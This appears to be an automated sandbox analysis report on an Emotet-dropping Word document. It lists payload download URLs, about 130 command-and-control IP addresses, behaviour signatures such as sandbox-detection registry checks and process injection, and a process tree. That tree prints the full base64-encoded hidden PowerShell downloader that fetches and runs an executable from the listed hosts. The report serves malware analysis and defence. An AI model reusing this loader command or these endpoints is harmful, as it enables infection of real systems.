Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
21-01-2020 19:59
General
Malware Config
Extracted
http://hawkeyesss.com/wp-content/r3d3hdjgnc-om4bkcvea-3543/
http://lookings.in/blog/xGJncTpch/
http://developer.md-partners.co.jp/UI/doCYRSxq/
http://e-twow.es/wp-content/dJilYkPOF/
http://bjenkins.webview.consulting/writer/3r09yemm-0uxjh-3049/
Extracted
emotet
81.214.253.80:443
98.15.140.226:80
180.33.71.88:80
178.33.167.120:8080
144.76.56.36:8080
176.58.93.123:80
51.38.134.203:8080
196.6.119.137:80
82.79.244.92:80
175.181.7.188:80
183.87.40.21:8080
201.183.251.100:80
91.73.169.210:80
188.251.213.180:443
110.142.161.90:80
177.144.130.105:443
106.248.79.174:80
70.45.30.28:80
187.72.47.161:443
185.244.167.25:443
153.183.25.24:80
24.141.12.228:80
181.196.27.123:80
82.165.15.188:8080
78.189.60.109:443
60.130.173.117:80
190.93.210.113:80
195.201.56.70:8080
58.92.179.55:443
110.2.118.164:80
78.189.165.52:8080
190.5.162.204:80
190.171.153.139:80
95.130.37.244:443
181.53.29.136:8080
61.221.152.140:80
88.247.53.159:443
153.137.36.142:80
37.70.131.107:80
186.147.245.204:80
183.82.123.60:443
85.109.190.235:443
105.209.235.113:8080
142.93.87.198:8080
181.39.96.86:443
125.209.114.180:443
88.248.140.80:80
162.144.46.90:8080
182.176.116.139:995
98.178.241.106:80
186.223.86.136:443
51.77.113.97:8080
122.176.116.57:443
24.70.40.15:8080
163.172.107.70:8080
81.82.247.216:80
212.129.14.27:8080
95.216.207.86:7080
82.145.43.153:8080
183.91.3.63:80
149.202.153.251:8080
182.74.249.74:80
160.119.153.20:80
203.153.216.178:7080
157.7.164.178:8081
42.51.192.231:8080
5.196.200.208:8080
89.215.225.15:80
78.188.170.128:80
82.146.55.23:7080
37.46.129.215:8080
75.86.6.174:80
88.247.26.78:80
41.185.29.128:8080
217.12.70.226:80
85.100.122.211:80
211.229.116.130:80
203.124.57.50:80
1.217.126.11:443
144.139.91.187:80
72.27.212.209:8080
78.186.102.195:80
172.104.70.207:8080
197.94.32.129:8080
122.116.104.238:7080
69.14.208.221:80
46.32.229.152:8080
80.211.32.88:8080
200.82.88.254:80
177.103.240.93:80
211.20.154.102:80
180.16.248.25:80
46.17.6.116:8080
88.225.230.33:80
61.204.119.188:443
175.127.140.68:80
88.249.181.198:443
76.11.76.47:80
192.210.217.94:8080
192.241.241.221:443
41.215.79.182:80
91.117.31.181:80
78.46.87.133:8080
186.84.173.136:8080
190.17.94.108:443
37.211.67.229:80
216.75.37.196:8080
178.152.92.246:80
179.5.118.12:8080
14.161.30.33:443
187.177.155.123:990
78.210.132.35:80
59.135.126.129:443
158.69.167.246:8080
60.152.212.149:80
91.83.93.103:443
154.73.137.131:80
58.185.224.18:80
95.9.217.200:8080
75.127.14.170:8080
212.112.113.235:80
77.74.78.80:443
139.59.12.63:8080
192.241.220.183:8080
1.221.254.82:80
160.226.171.255:443
69.30.205.162:7080
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3648 wrote to memory of 4680 3648 Powershell.exe 80 PID 4680 wrote to memory of 3940 4680 497.exe 81 PID 3772 wrote to memory of 4264 3772 devicesspace.exe 83 -
Executes dropped EXE 4 IoCs
pid Process 4680 497.exe 3940 497.exe 3772 devicesspace.exe 4264 devicesspace.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4972 WINWORD.EXE 4680 497.exe 3940 497.exe 3772 devicesspace.exe 4264 devicesspace.exe -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3648 5088 Powershell.exe 73 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3648 Powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\497.exe => C:\Windows\SysWOW64\devicesspace.exe 497.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4972 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3648 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 3940 497.exe 4264 devicesspace.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4c5b70ce5e0c105f0e22164fb8889b602261d94c50fae8caff0ace7e780f7367.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:4972
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABVAG0AYQBwAGYAaQBjAHMAegB4AGUAaQA9ACcARQB4AHQAegBlAHcAZgB3ACcAOwAkAE8AcQBtAGYAZQBwAHYAbABkAGoAIAA9ACAAJwA0ADkANwAnADsAJABIAGYAcwBxAGUAbAByAHIAdwB5AGgAbAA9ACcARABiAG4AbQBxAG0AZAB4ACcAOwAkAFAAYgB4AG8AcwB0AGwAZABnAG0AZAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBxAG0AZgBlAHAAdgBsAGQAagArACcALgBlAHgAZQAnADsAJABZAHMAZABlAGkAbQB4AHoAbAB4AD0AJwBLAGIAdQBtAG0AcQBsAGYAJwA7ACQAQgBuAGUAagBrAGIAZgBjAD0ALgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAEUAdAAuAHcAZQBiAGMATABpAGUAbgB0ADsAJABFAHMAcgBzAGsAZQBwAG4AZgBmAHcAPQAnAGgAdAB0AHAAOgAvAC8AaABhAHcAawBlAHkAZQBzAHMAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHIAMwBkADMAaABkAGoAZwBuAGMALQBvAG0ANABiAGsAYwB2AGUAYQAtADMANQA0ADMALwAqAGgAdAB0AHAAOgAvAC8AbABvAG8AawBpAG4AZwBzAC4AaQBuAC8AYgBsAG8AZwAvAHgARwBKAG4AYwBUAHAAYwBoAC8AKgBoAHQAdABwADoALwAvAGQAZQB2AGUAbABvAHAAZQByAC4AbQBkAC0AcABhAHIAdABuAGUAcgBzAC4AYwBvAC4AagBwAC8AVQBJAC8AZABvAEMAWQBSAFMAeABxAC8AKgBoAHQAdABwADoALwAvAGUALQB0AHcAbwB3AC4AZQBzAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGQASgBpAGwAWQBrAFAATwBGAC8AKgBoAHQAdABwADoALwAvAGIAagBlAG4AawBpAG4AcwAuAHcAZQBiAHYAaQBlAHcALgBjAG8AbgBzAHUAbAB0AGkAbgBnAC8AdwByAGkAdABlAHIALwAzAHIAMAA5AHkAZQBtAG0ALQAwAHUAeABqAGgALQAzADAANAA5AC8AJwAuACIAUwBQAGAATABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABGAHkAYgB2AHMAagB3AGMAbgBrAD0AJwBTAG0AaABtAGkAagBhAGkAegAnADsAZgBvAHIAZQBhAGMAaAAoACQASQB4AGcAcgBhAGsAaQBiAGUAZABtAGoAaAAgAGkAbgAgACQARQBzAHIAcwBrAGUAcABuAGYAZgB3ACkAewB0AHIAeQB7ACQAQgBuAGUAagBrAGIAZgBjAC4AIgBkAE8AVwBuAGwAYABPAGAAQQBgAEQAZgBpAGwAZQAiACgAJABJAHgAZwByAGEAawBpAGIAZQBkAG0AagBoACwAIAAkAFAAYgB4AG8AcwB0AGwAZABnAG0AZAApADsAJABaAHEAbAByAGUAegBuAGwAPQAnAE0AbQBmAGQAbgB1AG8AYwBqAGoAbwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAFAAYgB4AG8AcwB0AGwAZABnAG0AZAApAC4AIgBsAEUAbgBgAGcAdABoACIAIAAtAGcAZQAgADMAOQAyADQAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYABBAHIAVAAiACgAJABQAGIAeABvAHMAdABsAGQAZwBtAGQAKQA7ACQASQBlAHoAaABjAGYAbwBsAG8AdwA9ACcARwByAHMAYwBhAHoAawB0AGYAJwA7AGIAcgBlAGEAawA7ACQASgB2AG8AbQBmAHEAaABvAD0AJwBDAGoAegBhAGcAaQBvAHkAYgB5AGkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgB3AGsAaABqAHAAbwBqAGQAPQAnAFEAbABuAHQAagB2AGgAaAAnAA==1⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3648 -
C:\Users\Admin\497.exe"C:\Users\Admin\497.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4680 -
C:\Users\Admin\497.exe--14180dd03⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Suspicious behavior: EmotetMutantsSpam
PID:3940
-
-
-
C:\Windows\SysWOW64\devicesspace.exe"C:\Windows\SysWOW64\devicesspace.exe"1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3772 -
C:\Windows\SysWOW64\devicesspace.exe--379237bb2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
PID:4264
-